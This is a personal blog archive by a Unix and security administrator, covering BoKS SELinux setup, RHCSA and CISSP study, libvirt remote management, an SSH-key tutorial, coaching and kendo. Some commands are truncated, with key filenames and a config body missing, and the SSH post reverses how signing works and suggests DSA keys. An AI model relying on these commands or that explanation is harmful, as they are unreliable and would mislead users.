  2. I've got a BoKS master, replica and client, all version 6.7. However, installing BoKS on CentOS is a bit tricky and requires some trickery.
  3. Download the BoKS SELinux module files
  4. Put them in a working directory, together with a copy of the Makefile from /usr/share/selinux/devel/
  5. Run: make. If you use the files from my download, it should compile without errors. 
  6. Run: semodule -i boks. The first time that you're building the policy you'll need to install the module (-i). After that, with each recompile you will need -u, for update. 
  7. Run: touch /.autorelabel. Then reboot. Your system will change all the BoKS files to their newly defined SELinux types. 
  8. Run: setenforce 1. Then get testing!  Start poking around BoKS and check /var/log/audit/audit.log for any AVC messages that say something's getting blocked. 

I'd love to discuss the workings of the module with you and would also very much appreciate working together with some other people to improve on all of this. 


Update 05/11/2014:

Henrik Skoog from Sweden contacted me to submit a bugfix. I'd forgotten to require one important thing in the boks.te file. That's been fixed. Thanks Henrik!


Update 11/11/2014:

I have moved the project files into GITHub, over here tags: , , , ,

View or add comments (curr. 0)

Installing CentOS Linux as default OS on a Macbook

2013-08-12 16:46:00

While preparing for my RHCSA exams, I was in dire need of a Linux playground. At first I could make do with virtual machines running inside Parallels Workstation on my Macbook. But in order to use Michael Jang's practice exams I really needed to run Linux as the main OS (the tests require KVM virtualization). I tried and I tried and I tried but CentOS refused to boot, mostly ending up on the grey Tux / penguin screen of rEFIt

On my final attempt I managed to get it running. I started off with this set of instructions, which got me most of the way. After resyncing the partition table using rEFIt's menu, using the rEFIt boot menu would still send me to the grey penguin screen. But then I found this page! It turns out that rEFIt is only needed in order to tell EFI about the Linux boot partition! Booting is then done using the normal Apple boot loader!

Just hold down the ALT button after powerin up and then choose the disk labeled "Windows". And presto! It works, CentOS boots up just fine. You can simply set it to the default boot disk, provided that you left OS X on there as well (by using the Boot Disk Selector). tags: , , , ,

View or add comments (curr. 0)

RHCSA achieved

2013-08-12 16:23:00

Huzzah! As I'd hoped, I passed my RHCSA examination this morning. Not only is this a sign that I'm learning good things about Linux, but it also puts me 100% in the green for my continued CISSP-hood: 101 points in domain A and 62 in domain B: 163/120 required points.

I can't be very specific about the examination due to the NDAs, but I can tell a little bit about my personal experience. 

The testing center in Utrecht was pleasant. It's close to the highway and easily accessible because it's not in the middle of town. The amenities are modern and customer-friendly. The testing room itself is decent and the kiosk setup is exactly as shown in Red Hat videos. Personally, I am very happy that RH started with the kiosk exams because of the flexibility it offers. With this new method, you can sit for RHCSA/RHCE/etc almost every day, instead of being bound to a specifc date. 

The kiosk exam comes with continuous, online proctoring meaning that you're not stuck of something goes wrong. In a normal exam situation you'd be able to flag down a proctor and in this case you can simply type in the chatbox to get help. And I did need it on two occasions because something was broken on the RH-side. The online support crew was very helpful and quick to react! They helped me out wonderfully!

I prepared for the test by using two of Michael Jang's books: the RHCSA/RHCE study guide and the RHCSA/RHCE practice exams. If you decide to get those books, I suggest you do NOT go for the e-books because the physical books include DVDs with practice materials. Without going into details of the exams, I found that Jang's books provided me ample preparation for the test. However, it certainly helps to do further investigation on your own, for those subjects that you're not yet familiar with. tags: , ,

View or add comments (curr. 0)

Security measures all of us can take - part 3

2013-08-10 22:53:00

Here's another follow-up with regards to security matters I believe everybody should know. It's a short one: Email is not safe.

It has been said that you "don't put anything in an email that you wouldn't want to see on the evening news." It's not even a matter of the NSA/FBI/KGB/superspies. Email really is akin to writing something on a postcard: it's legible to anyone who can get his hands on it. And like with the postal service, many people can get their hands on your email. 

Here is an excelent and long read on the many issues with email. But to sum it up:

  1. In general, emails are transfered and stored unencrypted. Anyone on the same network as you can read them in passing. Anyone managing an email server can read the mails stored on them.
  2. Source/sender information is easily spoofed. There is no way to guarantee that an email actually came from whoever's name is at the top. 

These two problems can be worked around in a few rather technical manners, most of which are not very user friendly. The most important one is to use GPG/PGP, which allows you to encrypt (problem 1) and to digitally sign (problem 2) the emails that you send. It certainly helps, but it introduces a new problem: key exchange. You now need to swap encryption keys with all people with whom you'll want to swap emails. But at least it's something. 

In the mean time:

Want to send me an encrypted email? Here's my public key :) tags: , ,

View or add comments (curr. 0)

An update on certifications

2013-08-07 22:09:00

Here's a follow-up post to last year's "Confessions of a CISSP slacker".

By the end of last year I was woefully behind on my CPE (continued professional education) requirements, which are needed to retain my CISSP certification. Not only is CISSP a darn hard exam to take, but ISC2 also need you to garner a minimum of 120 study points each three years. In my first two years, I didn't put in much effort meaning I had a trickle of 51 points out of 120. Thus my emergency plan for making it to 120+ points in the span of a year.

All the calculations were made in the linked article and then I set things into motion. My resolve being strengthened by my personal coach I put together a planning for 2013 that would ensure my success. And my hard work has been paying off, because as of tonight I have now achieved the first milestone: the minimum of 80 points in "domain A" (screenshot above). 

The heaviest hitters in obtaining these 29 points are:

The remaining points were garnered by attending online seminars and by perusing a number of issues of InfoSecurity Professional magazine

Next monday I'm scheduled to be taking my RHCSA (Red Hat Certified System Administrator) exam. I've been working hard the past three months and I'm confident that I'll pass the practical exam on my first go. If I do, that's a HUGE load of CPE because all the study time counts towards my CISSP. That would be roughly 20 hours in domain A (security-related) and 60 hours in domain B (generic professional education). And that, my friend, would put me squarely over my minimal requirements! And I haven't even finished all the items on my wishlist :) tags: , ,

View or add comments (curr. 0)

KVM, libvirt, polkit-1 and remote management

2013-07-16 22:00:00

With Red Hat's default virtualization software KVM, it's possible to remotely manage the virtual machines running on a system. See here for some regular 'virt-ception'.

Out of the box, libvirt will NOT allow remote management of its VMs. If you would like to run a virt-manager connection through SSH, you will need to play around with Polkit-1. There is decent documentation available for the configuration of libvirt and Polkit-1, but I thought I'd provide the briefest of summaries.

Go into /etc/polkit-1/localauthority/50-local.d and create a file called (for example) 10.libvirt-remote.pkla. This file should contain the following entries:

[libvirt Remote Management Access]

This setup will allow anyone with (secondary) group "libvirt" to manage VMs remotely. That's a nice option to put into your standard build! tags: , , ,

View or add comments (curr. 0)

Virt-ception: we've got to go deeper

2013-04-11 20:45:00


I'm currently studying for my RHCSA certification. As part of the exam I will need to work with KVM virtual machines, which require a proper piece of hardware to run on.

Sadly I haven't been able to boot CentOS off a USB drive on my Macbook, despite numerous attempts. I've had a number of great tutorials, but no dice. Luckily my colleague Peter (not the one of the iMac) came to the rescue! He runs a sandbox system at home, which is a great playground to study for the RHCSA. He gave me an account and permissions to fiddle with KVM. 

Which is what landed me with the screenshot above. That's: tags: , , ,

View or add comments (curr. 2)

Successes from coaching

2013-02-24 20:52:00

Keuzes Maken

For the past few months I've been undergoing personal coaching, by Menno. Today we simply spoke about the successes I've booked over the past few weeks. All of them were brought on by actions I undertook based on the coaching i've been receiving. Each of the following was an 'action point' or 'todo' item from our sessions. tags: , , ,

View or add comments (curr. 1)

Starting preparations for RHCSA

2013-02-21 22:31:00

Well, this is a first. Sometime soon, my Macbook will be booting another operating system than Mac OS X for the very first time in its life. Sure it's run Solaris, Fedora and Windows! But that was using Parallels virtual machines...

In order to prepare for the RHCSA certification I will need to learn about setting up virtual machines on a physical Linux box. And since we don't have the €200-€300 to buy a test box (which I'll only use for these two exams) I'm stuck using my primary laptop. That means I will be taking notes locally on Linux, which should be a cinch using the Evernote web interface.

I just hope that running CentOS on an external USB 2.0 drive hooked up to my 2008 laptop won't be too slow to work with :) tags: , ,

View or add comments (curr. 0)

ITILv3 certification achieved

2013-02-17 08:55:00

ITILv3 certificate

Right, that's out of the way!

In late december I made a plan for 2013, which would enable me to retain my CISSP certification while at the same time restoring my relevance to the IT job market. A few weeks later I got started on my ITILv3 studies, but those ground to a sudden halt when I chose an awful book to study from. A week later I started anew using the study guide by Gallacher and Morris, which is a great book!

A month after starting the Gallacher and Morris book I took my exam using the EXIN Anywhere online examination. I didn't want to spend time away from the office to take this simple exam, which is why I went for the online offering. I'm very glad EXIN are providing this service! I thought I'd share my experience with the EXIN Anywhere method here.

I also provided EXIN with two pieces of feedback after taking the exam.

  1. During the setup phase, you are allowed to re-take your photograph and to re-take the photograph of your ID card. However, there is no option available to restart the room inspection. During my room inspection an error popped up from the proctor software which suggested that filming could maybe not be completed. But no definitive answer was provided and there was no option to restart the filming of your workspace. I sincerely hope I don't get failed on the exam because of this.
  2. The exam format is rather unfriendly, when compared to other computer-based exams. In essence it is simply a long HTML document with all the questions underneath eachother. Other testing suites (though admittedly offline) put the questions in much more user-friendly format. One question at a time, an option to mark questions for review, etc.

All in all I'm happy with how all of this went and it's certainly nice to have refreshed my ITIL knowledge. I last studied ITILv2 in 2001.

The fact that it took me a month to study for this test worries me a bit though. The total prep time for ITILv3 was 15 hours (translating into 15CPE for my CISSP). I'm fairly certain that my RHCSA will easily take over 80 hours, which does not bode well. I reckon it might be somewhere between my LPIC and my CISSP studies when it comes to workload. If I want to achieve it within a reasonable timeframe, I will need to stick to a much stricter regime. tags: , ,

View or add comments (curr. 1)

Structures: solidifying goals and intentions

2013-02-10 11:54:00

My dou, with motto

One of the recuring themes in my coaching sessions with Rockover are "structures": things you put in place to act as reminders of something that you need to (or want to) change. I've talked about one of'm before. In order to solidify my new motto, I've given it the same treatment as the previous one that I took in: both adorn the inside of my dou, the torso armor worn in kendo.

Sure, my kanji look crappy, but it will serve its purpose: to remind me of what I want to achieve at the beginning of every training session, class and seminar. 


That photograph reminds me: the Agyo omamori in my dou is officially way overdue on being returned to the shrine it came from. We bought it in Nara in october of 2011 (photo of the temple), meaning that we were supposed to return in three months ago. Since I'm not religious I don't believe I'm calling down any bad luck upon myself, but then again I do value tradition :) Maybe I should drop another email to the dutch shinto shrine tags: , , ,

View or add comments (curr. 0)

A new motto for this year: katsubou

2013-01-29 21:20:00


Well! It's not every day that I get a mention on a 7th dan sensei's blog :D

My motto for 2012 was enryo (遠慮): "restraint". 

The motto has served me well and I will continue to be inspired by it. It still adorns my desk and it is on the inside of my dou. At the office I have become better at communicating and at sticking to boundaries and in kendo I have become less apt to rush in foolishly. 

For 2013 I will be adding a new motto, katsubou (渇望): "hunger, craving".

This motto comes through inspiration by four people whom I've come to respect very much. Donatella-sensei and Vitalis-sensei, after their instructions at the last Centrale Training. And Kris and Hillen-fukushou, based on their feedback to our recent kyu exams. Summarizing it: without stupidly rushing in (see above), I need to crave achieving yuko datotsu on my opponent. I need to hunger for "kills" and to show eagerness in all my undertakings. Only then will I be properly training and will I be able to show my current skill level in a shinsa.

Interestingly, this motto is also applicable professionaly insofar that I'm working to retain my CISSP certification. I'd slacked off over the past two years, but now I'm working hard to make up for that. In order to achieve this plan fully, I need to be "hungry". I need to keep at it, working on each successive goal in order to reach the final destination. 

It'll be an interesting year :) tags: , , , ,

View or add comments (curr. 0)

ITILv3: bone dry material

2013-01-13 20:31:00

Dry dry dry

*cough**hack* Someone get me a glass of water! 

After getting some quick credits out of the way for my CISSP certification, I'm now moving on to ITILv3 Foundations, all according to plan. But boy, oh boy, is that some dry reading material! When I first took my ITILv2 exam in 2001, it took some slugging and then I made the certification in one go. So technically you would expect me to get through this renewal easily. Well, I'm working through this particular book and it's drrryyyyyyyyaaaaihhh. A veritable deluge... no, that implies "wet"... A veritable landslide of management terms and words, rammed into short definitions, makes for something I have trouble getting through. 

Maybe I'd better get another book :)

Pictures not mine, sources A and B. tags: , , ,

View or add comments (curr. 0)

Coaching: better than I expected

2013-01-12 13:45:00

Quite a while ago my dear friend Menno started a career in personal coaching. He's still a civil engineer, but as a side business he runs Rockover Coaching which is based on the co-active coaching formula. It took a lot of hard work, but he's now ready to start working with clients. As part of his startup year, he asked me whether I'd like to be a 'victim' and I gladly accepted. I may have an ingrained mistrust of coaches, but I know I can trust the guy who's been my best friend for 27 years ;)

Over the past few weeks we've used a lot of different techniques to explore various topics, such as:

So... After almost three months of weekly coaching I have to say it's a lot more fun and interesting than I thought before starting with Menno. I had a few other touch-feely courses (through work) before this, but none of those were as comfortable as this. tags: , , ,

View or add comments (curr. 1)

Study plan for 2013: continued education

2012-12-21 06:03:00

Because I like to keep work and my private life very much separated, I usually try to do as little IT stuff at home as possible. "Work is work, home is home", I often say and so far it's made for a pleasant balance between the two where I don't take home too much stress. But, as much as I dislike it, being in the IT workforce means there is a very real need for continued education. So every once in a while I will do a huge burst of studying in one go, to achieve a specific goal or two. Case in point: 2010's CISSP certification.

However, said CISSP certification means that I will now need to start using a different approach in my continued education. I can no longer work with infrequent bursts, as I need to obtain a certain amount of CPE credits every year. Which is why I broke out the proverbial calculator and did some math to determine what I should do on an annual basis to retain my CISSP. Instead of huge bursts of work, I will now be spreading out my studies.

Which is why I made the following planning, for my 2012/2013 studies.


Again, with many thanks to my colleague Rob for making the final needed suggestion to get me to sort out the CPE calculation. And to my coach in being my sparring partner in all of this. tags: , ,

View or add comments (curr. 0)

SSH keys for dummies: how to set up ssh_pk authentication

2012-12-20 21:18:00

How to set up SSH keys in three easy steps

Creating and configuring SSH key authentication can be a complicated matter. Ask any techie, including myself, about the process and you are likely to get a very longwinded and technical explanation. I will in fact provide that exhaustive story below, but here's the short version, where you set up SSH key authentication in three easy steps.


Quickly setting up SSH key authentication

Generate a new key pair using...

ssh-keygen -t rsa

...and just press Return on all questions.
Install the "lock" on your door using...

ssh-copy-id ~/.ssh/ $host

...where $host is your target system. Or, if ssh-copy-id is not available, copy these instructions.
You're done! Start enjoying your SSH connection!

ssh $host


Please feel free to print the poster of this three-step approach, just to make sure you don't forget them.


What is SSH anyway?

SSH, short for Secure SHell, is an encrypted communications protocol used between two computers. Both the login process as well as the actual data interchange are fully encrypted, ensuring that prying eyes don't get to see anything you are working on. It also becomes a lot harder to steal a user account, because simply grabbing the password as it passes over the network becomes nigh impossible.

The name, secure shell, hides the true potential of the SSH protocol as it allows for many more functions. Among others, SSH offers a secure alternative to old-fashioned (and unencrypted) protocols such as Telnet and FTP. It offers:

SSH is cross-platform, insofar that both server and client software is available for many different operating systems. Traditionally it is used to connect from any OS to a Unix/Linux server, but SSH servers now also exist for Microsoft Windows and other platforms.

SSH is capable of using many different authentication and authorization methods, depending on both the version of SSH that is being used and on the various provisions made by the host OS (such as PAM on a Unix system). One is not tied to using usernames and passwords, with certificates, smartcards, "SSH keys" (what this whole page is about) and other options also being available.

Unfortunately, its flexibility and its many (configuration) options can make using SSH seem like a very daunting task.


What are SSH keys?

The default authentication method for SSH is the familiar pair of username and password. Upon initiating an SSH session you are asked to provide your username first, then your password, after which SSH will verify the combination against what the operating systems knows. If it's a match, you're allowed to login. If not, you're given another chance or so and ultimately disconnected from the system. However, the need to enter two values manually is a burden when trying to automate various processes. It often leads to hackneyed solutions where usernames and passwords are stored in plaintext configuration files, which really defeats the purpose of using such a secure protocol.

SSH keys provide an alternative method of authenticating yourself upon login. Taken literally, an SSH keypair are two ASCII files containing a long string of seemingly random characters and numbers. These keys are nearly impossible to fake and they only work in pairs; one does not work without the other. The reason why SSH key authentication works, is because what is encrypted using one key can only be decrypted using the other key. And vice versa. This is the principle behind what is known as public key cryptography.

Public key encryption, and thus SSH key authentication, is a horribly complex technical matter. I find that for most beginners it's best to use an analogy.

A keypair consists of two keys: the public and the private key. The public key could be said to be a lock that you install on an account/server, while the private key is the key to fit that lock. The key will fit no other lock in the world, and no other key will fit this particular lock.

Because of this, the private key must be closely guarded, protected at all cost. Only the true owner of the private key should have access to it. This private key file can be protected using a password of its own (to be entered whenever someone would like to use the key file), but it is often not. Unfortunately this means that, should someone get their hands on the private key file, the target account/host becomes forfeit. Thus it's better to use a password protected keyfile in combination with SSH-agent. But that's maybe a bit too advanced for now :)

The public key on the other hand can be freely copied and strewn about. It is only used to set up your access to an account/server, but not to actually provide it. The public key is used to authenticate your private key upon login: if the key fits the lock, you're in. "Losing" a public SSH key poses no security risk at all.

Of course there's one caveat: while losing a public key is not a problem, one should not simply add public keys onto any account! Doing so would enable access to this account/server for the accompanying private key. So you should only install public keys that have good reason for accessing a specific account.


How does SSH key authentication work?

So how does SSH key authentication work? It all relies on a public key infrastructure feature called "signing". The exact process of SSH key authentication is described in IETF RFC 4252, but the gist of it is as follows. 

  1. The destination system "signs" a test message with your public key
  2. The source system verifies that signature using your private key
  3. If the signature checks out, then we know that the pair of keys match. You're allowed to login.

As I said, this only works because the public and private key have an unbreakable and inimmitable bond.

All of the following text assumes that you already HAVE a ready-to-use SSH keypair. That's the first step in the three-step poster shown at the top of this page. Generating a keypair is done using the ssh-keygen command, which needs to be run as the account that will be using the keys. Basically: ssh-keygen -t dsa is all you need to run to generate the keypair. It will ask you for a passphrase (which can be left empty). 


What if you don't have ssh-copy-id?

Unfortunately ssh-copy-id is not included with every SSH client, especially not if you're coming from Window. Unfortunately, the instructions below will only work when your source host is a Unix/Linux system, so if you're using Windows as a source you will definitely need to use the manual process. The script below also assumes that the remote host is running OpenSSH.

Copy and paste the script below into a terminal window on your source host. It will ask you to enter your password on the remote host once.


echo "Which host do we need to install the public key on?"
read HOST
ssh -q $HOST "umask 077; mkdir -p ~/.ssh; echo "$(cat ~/.ssh/" >> ~/.ssh/authorized_keys"


This could fail if the public key file is named differently. It could be instead, or something completely different if you are running a non-vanilla setup. 

Setting up SSH keys the hard way

So, finally the hardest part of it all: getting SSH keys to work, without the use of ssh-copy-id or any other handy-dandy tooling. 

First up, there is the nasty fact that not all SSH clients and daemons were created equal. There are different standards that they can adhere to when it comes to key file types as well as the locations thereof. Because Linux and open source software have become so widespread, OpenSSH has become very popular as both client and server. But you'll also see F-Secure, Putty, Comforte, and a whole wad of others out there. 

To find out which Unix SSH client you're running, type: ssh -V

For example:

$ ssh -V
ssh: F-Secure SSH 5.0.3 on powerpc-ibm-aix5.3.0.0

$ ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8j 07 Jan 2009



Putty and WinSCP

When you are going to be communicating from one type of host to another (SSH2 vs OpenSSH), then you will need to perform key file conversion using the ssh-keygen command. The following assumes that you are running the command on an OpenSSH host.

Key points to remember

Always make sure you are clear:

File permissions tags: , ,

View or add comments (curr. 0)

Confessions of a CISSP slacker

2012-12-09 10:30:00

And to think... At the end of 2010 I was ecstatic about achieving CISSP status, after weeks of studying and after a huge exam. I loved the studying and the pressure and of course the fact that I managed to snag a prestigious certificate on my first attempt.

Well, the graphic on the left is a variation of my celebratory image of the time. I'm sad to say that I've been slacking off for the past two years, only doing the bare essentials to retain said title. Why? My colleague Rob had it spot on: "It seems like such a huge, daunting task to maintain your CPE." But in retrospect it turns out that he's also right insofar that "it really isn't that much work!".

Let's do some math, ISC2 style!

In order to maintain your CISSP title, you need to earn a total of 120 CPE in three years' time. As an additional requirement, you must earn 20C CPE every single year, meaning that you can't cram all 120 credits into one year. To confuse things a little, ISC2 refer to group A and group B CPE (which basically differentiates between security work and other work). 

Now, let's grab a few easily achieved tasks that can quickly earn at least the minimum required CPE.

That right there is 27 CPE per year, all in group A, which meets the required minimum. it's also 81 CPE out of the required 120 CPE for our three year term.

Of the 120 hours, a total of 40 can be achieved through group B, which involves studying other subjects besides IT security. In my case, the most obvious solution for this is self-study or class room education followed for Unix-related subjects. In the next few months I will be studying for my RHCSA certification (and possibly my SCSA re-certfication), which will easily get me the allowed 40 hours. 

That means I only need to achieve 120 - (81+40) = -1 more CPE through alternative ways :) Additional CPE can be achieved through podcasts, webcasts or by visiting trade shows and seminars. One awesomely easy and interesting way are ISC2 web seminars, which can be followed both realtime and on recordings.

Now, because I've been slacking off the past two years, I will need to be smart about my studies and the registration thereof. I'm putting together a planning to both maintain my CISSP and to prepare for my RHCSA. 

It's time to get serious. Again. ;)


It looks like it's a good idea to also renew my ITIL foundations certification. If I'm not mistaken, that can be counted towards group A of CPE, as ITIL is used in domains pertaining to life cycle management, to business continuity and to daily operations. I'll need to ask ISC2 to be sure.

Also, many thanks to Jeff Parker for writing a very useful article, pertaining specifically to my plight. tags: , ,

View or add comments (curr. 1)

Coactive coaching: DO-DONT structure

2012-11-05 07:35:00

dont bark do restrain yourself

Recently I started a coaching process with Rockover Coaching (about which I'll write more later). In our third fruitful session I was assigned a bit of homework: make a structure for use in the office, to remind me of some of my personal DOs and DONTs.

In this case the DONT is my at-times hyperactive approach in communicating: too fast, not letting people come to their conclusions, sticking my nose in and generally forcing an opinion. The DO is the polar opposite of this, which I have already set as goal for 2012: enryo, self-restraint, calmness and respect. The intention of the structure is to put something in place that inherently reminds me of these DOs and DONTs at any given time, so I chose to hang up a poster at my desk.

Looking for graphics that trigger the DO and DONT in my mind, the DO is obviously represented by the kanji for the word "enryo" (as discussed before). When it came to the DONT one thing immediately popped into my head: Dexter's Laboratory's talking dog. The overly excited, busybusy, shouty dog who yelps for attention exclaiming that "I FOUND THE THING! THE THING! I GOT THE THING!" Or that's how it went in dutch, in english apparently it's "found you", but hey.

So... The above poster is what I whipped up in a few minutes and as per this blogpost it's delivered to my coach. There you go sir! ;) tags: , , ,

View or add comments (curr. 3)

Exchanging blows with colleagues

2012-05-11 08:00:00

Misleading title FTW. /o/ For once I'm not writing about another colleague I pissed off :p

Yesterday was the annual field trip of my department at $CLIENT. After a last-minute change of plans due to the weather we all gathered at a far-away gymnasium to partake in an introductory class in fencing. Sabre fencing to be specific.

I enjoyed it, fencing's cool! :) If I weren't into kendo already, I would've probably picked up fencing especially because Almere has a rather large club. Reminds me of another company outing, which led to me trying a new sport.

Here's some observations based on my kendo experience: tags: , ,

View or add comments (curr. 0)

Learning from my mistakes

2012-03-30 11:13:00

The past month I've been paying more attention to my methods of communicating and of working, all under the motto of enryo: "restraint". Overall I see improvement, but with the help of colleagues I've also recognized a number of slipups. 

A while back I stated a number of targets for myself, after a big kerfuffle at the office. Here's how things have gone so far.

This is by far the easiest target. I've simply refrained from contacting R or any of his colleagues in any way or form. Any work that needs to be done together with them was defered to my colleagues. However, there was also a bit of misunderstanding on my part: this target was not only targeted at R and his team, but also at the other team. So, no less than two weeks after the troubles I made the mistake of contacting E from the other team, which blew up in my face. So, the target's been extended to: "I will refrain from contacting R, E and their teams in any way".

I almost stuck my foot in a hornets' nest yesterday! 

Almost a year ago I helped out one of the big projects going down at $CLIENT to achieve their über-important deadline. It involved some changes to one of our BoKS environments and also involved some programming to change the infrastructure. At the time I was in the lead, but I frequently discussed the matter with R to make sure things would work properly. The project met its deadline "and there was much rejoicing".

Now, there's a follow-up to the project which requires more programming to change the infrastructure. The project team defaulted to contacting me about it, as I'd been in the lead last time. Falling back into my old project-mode I quickly joined up and started discussing the matter. It was only when one of my colleagues remarked that R was also working on the programming that I remembered that this programming officially falls under R's team's responsibilities. And thus I came this -><- close to breaking this target! So many thanks to my colleague Rishi for jogging my memory! ( ^_^)

This has gone well! We've had a few problems and incidents that require cross-department cooperation in order to troubleshoot and solve the issue. In each of these cases I've drawn up complete reports of my findings and methods, which I then transfered to one of my team members. I urged them to go over my work, to make sure I didn't make any mistakes and to add to it, so they could then continue working on the project with R's and E's teams. 

One of the biggest things I did to achieve this goal was to build a filter into my Outlook mailbox: all of my email will be delayed by an hour, for re-reading and adjustment, to prevent foot-in-mouth situations. That is, unless I go out of my way to tick a certain box that says "send this email right now" (which is, in three minutes).

This has gone reasonably well, although I find that it's too easy to make the six clicks required for the "send immediately" option. I need to use this frequently when I'm on a specific shift, but I've also found myself using it with normal emails. That's not good and in one case it led to an illworded email making it to a customer. I discussed the matter with my colleague Tommy, who pointed out a few things to remind me of my own goals: it's better to phone than to email and never send emails when you're agitated

And that's the key in this case: it happened when a customer had crossed a number of security guidelines in a rather blatant manner, which I felt needed to be dealt with quickly. My bad: I should've sat on my email a bit, reread it and then phoned the customer to call a meeting. Live and learn.

I've not confered with my colleagues often enough in this regard. Sure I've asked them a few times, when I was in doubt... but I'm not in doubt often enough! (;^_^) tags: , ,

View or add comments (curr. 0)

Forcing restraint in email: message delays and reminders

2012-03-01 18:11:00

A warning message in your email template: be careful what you write

Last week I made a few resolutions for myself regarding communicating at work. These resolutions were reaffirmed today, in a meeting with my manager and are now stated thusly:

In order to help myself stick to these resolutions I've made a few configuration changes to my Outlook email client. These are by no means guarantees that I will improve, but they serve as stern reminders that my mindset needs changing. 

Every email I start writing, whether it's a reply or a new message, is filled with a big warning template asking me "Are you really using email? Wouldn't it be better to phone?". It also reminds me to "Watch your phrasing! Are you CCing people?". I couldn't find a way in Outlook to set up a template or standard email to do this, so I've adjusted my email signature to serve the purpose. 

I have also set up two filtering rules to delay my outgoing messages. With many things to How-to Geek's 'Preventing OhNo! after sending emails'.

  1. Apply rule to mail I send: assigned to category "CHECKED", delay delivery for 2 minutes and stop processing rules.
  2. Apply rule to mail I send: assign mail to category "NEED TO CHECK" and delay delivery for 60 minutes, except if mail is assigned to category "CHECKED", or if message is invitation or update.


The second rule determines that every single email i send will be delayed for an hour. This will prevent many foot-in-mouth situations and will also force me to review my message. Each of these messages gets classified as "NEED TO CHECK", unless I specifically go out of my way to set the message to "CHECKED". All messages marked as "CHECKED" will be delayed for only two minutes, after which they'll go on their way to the addressee.

I will also add an hourly reminder to my agenda to prompt myself to review all pending emails.

My manager indicated upfront that these changes will drastically lower my throughput at the office. Part of the reason why I'm so damn fast with our ticket queue is because my over-reliance on email: fix an issue, inform client through email, BOOM! next ticket! I have to admit that I felt a few pangs of OCD at this realization, because I always worry about our ticket queue. We're already behind on our work, so if I'm going to get slower we'll only get behind further. Luckily my manager takes this for granted, as she feels that fixing my communications issues is more important than our current workload. Wow!

I'm quite hopeful that these measures will aid me in improving my communications at work. Right now I still need external stimuli to practice enryo


Sadly there is no way of implementing the second set of precautions in Apple's The software does not support rules on outgoing email without the support of Mail ActOn and even then it only allows such things as filing the sent message. It will not allow delays or forcing messages to be saved as drafts. 

Because of this I tried to give Thunderbird a shot, but I still hate that piece of software. I can't help it. Alternatively I think Sparrow looks great, but I don't think it has the options I'm looking for. Even Entourage 2008 doesn't appear to support the kind of rules I'm using in Outlook 2003 at the office ;_; 

In the end I implemented my 'helpers' in by:

  1. Adding a default signature, just like the one described above. 
  2. Remapping shift-command-d (Send message) to save the message as a draft. tags: , , ,

View or add comments (curr. 2)

Doesn't that hit too close to home?

2011-08-14 10:26:00

work environment = lab environment

From Dilbert, of course. tags: , ,

View or add comments (curr. 5)

AWW YEAH! I passed my CISSP exam!

2010-12-14 21:29:00

Aw yea!

Tonight, after weeks of waiting and finally getting fed up with it all, I finally got the liberating email from ISC2:

"Dear Thomas Sluyter:

Congratulations! We are pleased to inform you that you have passed the Certified Information Systems Security Professional (CISSP®) examination - the first step in becoming certified as a CISSP."

As predicted they never mention anything about my passing grade, but I made it. The six months of studying and cramming paid off! Also congratulations to my work buddy Patryck, who's also passed. Both of us, on our first try. /o/

Image blatantly ripped from Super Effective, which is awesome ^_^ tags: , , ,

View or add comments (curr. 7)

Finally! I've taken my CISSP exam

2010-11-14 07:40:00

A large room of people

It has been a very long time in coming, but yesterday I finally took my CISSP exam. I started preparing for my exam five months ago, but reading the big 1200 study guide from cover to cover. I've followed online classes and went to a week-long review class. And finally I took a few practice exams, both the ones included with the Harris book as well as those at And finally, in the last week before the exam I read through an excellent CISSP summary, written by my colleague Maarten de Frankrijker (awesome work Maarten!).

All in all I felt pretty well prepared for the exam.

Yesterday I left home at seven and because I arrived at the exam site 1.5 hours early I quickly went to the market in nearby Nieuwegein to pick up some stuff and have a chat with old acquaintances. I arrived back at the exam site half an hour early, at 0830. While other people were still rifling through their study guides and summaries, I instead opted to simply read "The League of Extraordinary Gentlemen" ^_^ I mean, if you don't know the materials an hour before the exam, all the cramming in the world isn't going to help you :)

We started the exam at 1005 and I finished at 1310, so it took me almost exactly three hours including breaks. My strategy for the test? I divided the 250 questions into ten blocks of 25. For each block I answered the questions in the booklet, did a quick double check and then copied the answers to the answer sheet. I then took a one minute break, stretching, yawning and having a drink after which it was back to the next block of questions. After a hundred questions (so twice in the exam) I take a longer break, to walk around a little, to do some more stretching, to have a sandwich, etc. All in all, I made sure to remain relaxed at all times, assuming that pressure would only make me screw up questions.

Could I have used more time? Sure. Could I have gone over all 250 questions to see if I had made any mistakes? Sure. But I didn't. I felt right about the majority of questions I'd answered and figured that, if I -did- make any mistakes, I'd play the numbers game. How many questions would I have accidentally answered incorrectly? I feel that the chance is small. So, I was the first one to finish the exam and walk out of there. 

I'm very curious what the results will be! Unfortunately it'll take a while for the results to come in, a few weeks I'm told. tags: , ,

View or add comments (curr. 9)

Two nice tools for my daily workflow

2010-10-24 09:42:00

Evernote + EgretList

A month or so ago I started using Evernote, which could be described as a digital scrapbook-meets-notebook-meets-filestorage. The application and its basic use are free and available cross-platform, with a very nice web interface and client software for Mac OS X, Windows, iPhone OS, Blackberry and a few others. Anything that you add to your Evernote storage gets synchronized to all of your devices automatically. This means that the notes I took during my CISSP class were synced to my iPhone and that the web clippings I made at home can also be read online. And so on. It really is a nice service and there's no beating the price!

Evernote also have a paid service, which adds extra functionality to your account. Your file storage space gets increased, the search function indexes any PDFs you store and your mobile Evernote client will be able to store all of your notebooks locally (instead of accessing them through Wifi or 3G). At $45 a year I wouldn't say the value's bad. So far Evernote's been very, very helpful to me.

Helpful how? Well, currently I have two distinct workflows I rely on heavily. On the one hand there's my studies for my CISSP exam and my security research. On the other hand there's my preparations for the BoKS course I will be teaching in a week. Since Evernote allows me to create multiple scrapbooks, it's a cinch to grab any Wiki pages I like, as well as any security PDFs and store them together with my CISSP class notes and my ToDo list. Similarly, for the training I have an easy ToDo list, many notes from teleconf phone calls and suggestions for new exam questions. All neatly taggable, searchable and editable. 

Speaking of ToDo lists: I have combined my Evernote account with the stunningly beautiful EgretList iPhone app. EgretList logs into your Evernote account and searches all your notes for any and all (un)finished ToDo items. These ToDo items are sorted by their Evernote categories and notebooks and presented as a faux Moleskine notebook. So instead of having to search through many different Evernote notes to check/unckeck a ToDo item, you can easily do it through EgretList. Lovely :) tags: , , ,

View or add comments (curr. 3)

Security problems: password entropy versus reuse

2010-09-14 22:24:00

An interesting security conversation

Comic continues here

As a security guy this comic makes 100% sense and it is in fact a very likely scenario. It is also the one reason why we (Marli and I) never use the same password twice, either between accounts or when rotating them semi-frequently. tags: , ,

